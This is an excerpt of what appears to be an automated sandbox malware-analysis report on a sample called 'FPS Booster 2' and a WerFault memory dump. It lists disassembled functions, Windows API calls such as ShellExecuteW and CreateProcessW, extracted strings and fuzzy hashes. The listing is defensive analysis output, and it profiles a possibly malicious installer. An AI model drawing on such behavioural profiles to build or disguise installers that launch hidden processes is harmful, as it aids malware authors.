                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426D70,76F923A0,00000000), ref: 00404FD6
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FE6
                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FF9
                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                Strings
                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                • API String ID: 3156913733-2180253247
                                                • Opcode ID: 0bb6b8ce784cb0e24e6f2575b12dc76b30e1726603d1717acb46156766e421bd
                                                • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                • Opcode Fuzzy Hash: 0bb6b8ce784cb0e24e6f2575b12dc76b30e1726603d1717acb46156766e421bd
                                                • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringlstrcmp
                                                • String ID: !N~
                                                • API String ID: 623250636-529124213
                                                • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                Strings
                                                • Error launching installer, xrefs: 00405C74
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                Strings
                                                • File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1), xrefs: 004062D1, 004062D6
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: CloseHandlelstrlenwvsprintf
                                                • String ID: File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1)
                                                • API String ID: 3509786178-482480894
                                                • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                Executed Functions

                                                Function 00007FF887B3109D Relevance: 1.5, Strings: 1, Instructions: 289COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0DL
                                                • API String ID: 0-3174716889
                                                • Opcode ID: f2c46e0f8f6d850ab78730a8821eb6500761faef60a1d9aeaf754e4ca43b0904
                                                • Instruction ID: 119d57772ae24fa8c90c917824dfbc16773375fadd4fa2883ce030bbc936eb7e
                                                • Opcode Fuzzy Hash: f2c46e0f8f6d850ab78730a8821eb6500761faef60a1d9aeaf754e4ca43b0904
                                                • Instruction Fuzzy Hash: 48914A71D4891E9FEB94EA68D8956ECB7F6FF59340F4011BAC00DD7282DE38A985CB40
                                                Function 00007FF887B37E08 Relevance: 13.7, Strings: 10, Instructions: 1246COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6B$6B$6B$6B$6B$6B$6B$#S}$0DL$0DL
                                                • API String ID: 0-975879146
                                                • Opcode ID: 3ba443e16cd1a0307ddeec9b2dcdfa3d864eba2f7a4ad5a644e3fee43993c0f1
                                                • Instruction ID: 140d3897d0540e3cf4ac3be6237e9878c8ff63a23785a728adc9c1bd68eee8e0
                                                • Opcode Fuzzy Hash: 3ba443e16cd1a0307ddeec9b2dcdfa3d864eba2f7a4ad5a644e3fee43993c0f1
                                                • Instruction Fuzzy Hash: 5EB2B47094891D8FDBA9EB18D895BA8B7B6FF58340F5041A9D01DE7292CB35AEC1CF01
                                                Function 00007FF887B3A425 Relevance: 6.7, Strings: 5, Instructions: 457COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $r6B$r6B$r6B$r6B
                                                • API String ID: 0-1635170207
                                                • Opcode ID: 8e69324ac96e16d7096675c07d3660301a6bed56ed6e3361f61bd6b69e040f57
                                                • Instruction ID: 531cf217c3d51cf424373e786445c9893699be9c06f6758e1f8addbda69bc3ff
                                                • Opcode Fuzzy Hash: 8e69324ac96e16d7096675c07d3660301a6bed56ed6e3361f61bd6b69e040f57
                                                • Instruction Fuzzy Hash: 14F1A530E48A4A8FE759DB58D8946ADB7F2FF58340F24457DD04EC7696CA38B882DB40
                                                Function 00007FF887B30648 Relevance: 6.6, Strings: 5, Instructions: 376COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$"$-$[${
                                                • API String ID: 0-3019564589
                                                • Opcode ID: 62be6fe03f63106f15092de3b20833f59999398b36c1d4d0f7b557e567e718bf
                                                • Instruction ID: 9bc96395b74b19cc5db9711a3f316c0f9bfdf8bcc8ea2540b7ccb6055a2a214f
                                                • Opcode Fuzzy Hash: 62be6fe03f63106f15092de3b20833f59999398b36c1d4d0f7b557e567e718bf
                                                • Instruction Fuzzy Hash: 32E1D570D1862A8FEBA8DF68D8947EDB7B2FF58341F5041B9D44DA7281CA386985CF40
                                                Function 00007FF887B3D51D Relevance: 5.4, Strings: 4, Instructions: 437COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /B$/B$/B$/B
                                                • API String ID: 0-2403987392
                                                • Opcode ID: 334419b4606218fb2629c4313bd6356eedc188156e205eded8a3c241747a931d
                                                • Instruction ID: 9180fdbe53a188556fa034f96ba7fdefc4eb332634e41411ca7045e617611865
                                                • Opcode Fuzzy Hash: 334419b4606218fb2629c4313bd6356eedc188156e205eded8a3c241747a931d
                                                • Instruction Fuzzy Hash: C902F4309189598EEB95EB68C899BECB7B2FF58340F5041EAD01DD3292DE3969C1CF41
                                                Function 00007FF887B36008 Relevance: 4.2, Strings: 3, Instructions: 438COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8eL$N_I$N_I
                                                • API String ID: 0-4106880614
                                                • Opcode ID: f226a5625b9edb5a0f42bbcd3acd3d83c2dfddcafaf4b434f4040787a76349a4
                                                • Instruction ID: c5fe8b62dac5ab55b248289f9b39d6ebc0228be3166702163d7f02f299b102a9
                                                • Opcode Fuzzy Hash: f226a5625b9edb5a0f42bbcd3acd3d83c2dfddcafaf4b434f4040787a76349a4
                                                • Instruction Fuzzy Hash: 72D11572E8C9869FE7448B68E8416BDBBF2FF55750F0441BAD008C71CBDE28A985C781
                                                Function 00007FF887B3C0ED Relevance: 4.0, Strings: 3, Instructions: 262COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6B$L$L
                                                • API String ID: 0-3737499674
                                                • Opcode ID: 31fdd66b103848a97b2de8cde098a3c2511de76eb847b7fc690c8ad6398bfa2d
                                                • Instruction ID: 908a91cec2d18cc5d95e545812a95d9c33d705fb7c4e78e2efa7278053630f00
                                                • Opcode Fuzzy Hash: 31fdd66b103848a97b2de8cde098a3c2511de76eb847b7fc690c8ad6398bfa2d
                                                • Instruction Fuzzy Hash: FFA19170A08A5D8FDF98EF58C894BA9B7F1FF69301F1045A9D00DE7296CA35A985CB40
                                                Function 00007FF887B3C6DE Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (3K$^N_H$r6B
                                                • API String ID: 0-95864145
                                                • Opcode ID: 33917350ec99588e6c040d7945e099cf1c4922d466afb55a83e410766eedb50e
                                                • Instruction ID: 52d95e83490f72f85c4de52613782813f11a54a619e5a6c93beba6cd517afaae
                                                • Opcode Fuzzy Hash: 33917350ec99588e6c040d7945e099cf1c4922d466afb55a83e410766eedb50e
                                                • Instruction Fuzzy Hash: EA319730E5895E8FDF84EBA8D499AAD7BF1FF58341F540165D00DE72A6DB38A881CB40
                                                Function 00007FF887B35F5D Relevance: 3.8, Strings: 3, Instructions: 2COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8eL$N_I$N_I
                                                • API String ID: 0-4106880614
                                                • Opcode ID: 9b327634b3a5c9b9df33ddb26911ec8584d6efcca3358c6d10e96d9fa50011dd
                                                • Instruction ID: 6e7ab5de08090d80917d80c7e7aac02eef25f4f4bb4dea6f21fd88126392ef08
                                                • Opcode Fuzzy Hash: 9b327634b3a5c9b9df33ddb26911ec8584d6efcca3358c6d10e96d9fa50011dd
                                                • Instruction Fuzzy Hash:
                                                Function 00007FF887B3AD1D Relevance: 2.9, Strings: 2, Instructions: 380COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B$r6B
                                                • API String ID: 0-2860294223
                                                • Opcode ID: 28347800a753de3ced5cdd5f8b63b6f78420a6b636f48e1aeac6645e1fc9af71
                                                • Instruction ID: 900ae8e7d30f86c2d6efce07301f850926a0c2296e633364826cc50ffdd54e67
                                                • Opcode Fuzzy Hash: 28347800a753de3ced5cdd5f8b63b6f78420a6b636f48e1aeac6645e1fc9af71
                                                • Instruction Fuzzy Hash: A2E16D30D4865A8FDB59CB58C495ABCB7F2FF58344F2045BED06ED7286CA386982CB01
                                                Function 00007FF887B3FE3F Relevance: 2.8, Strings: 2, Instructions: 263COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B$r6B
                                                • API String ID: 0-2860294223
                                                • Opcode ID: ba372eee3ca6d65194f9c2179dde1b79f8c35884bb9df064ea542cbfc3769746
                                                • Instruction ID: 1be871bd9456f0ddd70bf07ef8591783350228c57d875c09c1271d3e3a5a2372
                                                • Opcode Fuzzy Hash: ba372eee3ca6d65194f9c2179dde1b79f8c35884bb9df064ea542cbfc3769746
                                                • Instruction Fuzzy Hash: 8991E43094CB8A8FE755DB2894946A9B7F2FF55340F5445BEC09AC7693DA39F842CB00
                                                Function 00007FF887B316C5 Relevance: 2.6, Strings: 2, Instructions: 127COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O_H$HBL
                                                • API String ID: 0-3339347136
                                                • Opcode ID: 7924c530bde0ecc6deecc4a8a85c3340478a2b31c8d728ed670bd185c92b535e
                                                • Instruction ID: 508c7af14150ddd3c1b596bb6c2e7c407eadbe4123089a28ae0d32bc470025dd
                                                • Opcode Fuzzy Hash: 7924c530bde0ecc6deecc4a8a85c3340478a2b31c8d728ed670bd185c92b535e
                                                • Instruction Fuzzy Hash: 6141BB71C18A8E9FEB45EBA8D8156FDBBF5FF05341F0801BAD009E7282DE286944CB41
                                                Function 00007FF887B3C6A6 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ^N_H$r6B
                                                • API String ID: 0-2163777836
                                                • Opcode ID: 86e78efd322249dee60d89f879cce2fbf2ba80d17d6d376860c9843010d5425d
                                                • Instruction ID: 60839c7374113f0f772e0768e9aefe90deb277475e68739c0526d06b15d82f07
                                                • Opcode Fuzzy Hash: 86e78efd322249dee60d89f879cce2fbf2ba80d17d6d376860c9843010d5425d
                                                • Instruction Fuzzy Hash: 8E319770A5891D9FDF84EB98D499EAE77F1FF58341F000069D00DD7292DA38A881CB40
                                                Function 00007FF887B316E0 Relevance: 2.6, Strings: 2, Instructions: 91COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O_H$HBL
                                                • API String ID: 0-3339347136
                                                • Opcode ID: 11bce277aeadbc8d94aa30e086433060878ffe0e93bf7cb5d4f1a6365a84ee62
                                                • Instruction ID: 0b6a43e748d1ca8dbe9fa7925e31c5404dbf5dc7b8b1acb70e9e5b98c02c0a90
                                                • Opcode Fuzzy Hash: 11bce277aeadbc8d94aa30e086433060878ffe0e93bf7cb5d4f1a6365a84ee62
                                                • Instruction Fuzzy Hash: C6314AB1C18A4E9EEB44EBA8D8157EDB7F2FF59741F0401BAD009E3296DE386944CB41
                                                Function 00007FF887B3C6F0 Relevance: 2.6, Strings: 2, Instructions: 80COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ^N_H$r6B
                                                • API String ID: 0-2163777836
                                                • Opcode ID: 08d9cfa442e5b22de706fa82ae3f004a45024285e0644713b5f44de028c48559
                                                • Instruction ID: 091ac8a17e183f6125da63daa9f3ccce799349385adf9629d4f129ad31a341ac
                                                • Opcode Fuzzy Hash: 08d9cfa442e5b22de706fa82ae3f004a45024285e0644713b5f44de028c48559
                                                • Instruction Fuzzy Hash: 07219731E1491D8FDF84EFA8D499EADB7F1FF58341B404465D11DD72A6DA38A881CB40
                                                Function 00007FF887B3A796 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $r6B
                                                • API String ID: 0-2315467569
                                                • Opcode ID: 2f29856645f88beb154239aa3103b07130a0d39b061508006040e3d6de879e71
                                                • Instruction ID: 92411a4b304f3dd571bcceb3273a58d6db9dab28c74bf6e3d684730ce97c65da
                                                • Opcode Fuzzy Hash: 2f29856645f88beb154239aa3103b07130a0d39b061508006040e3d6de879e71
                                                • Instruction Fuzzy Hash: 21213B32D9850BDAEB599A98D8586FCB7F2FF44381F64427AE00DD21C6CE282482DB41
                                                Function 00007FF887B401DC Relevance: 2.6, Strings: 2, Instructions: 58COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
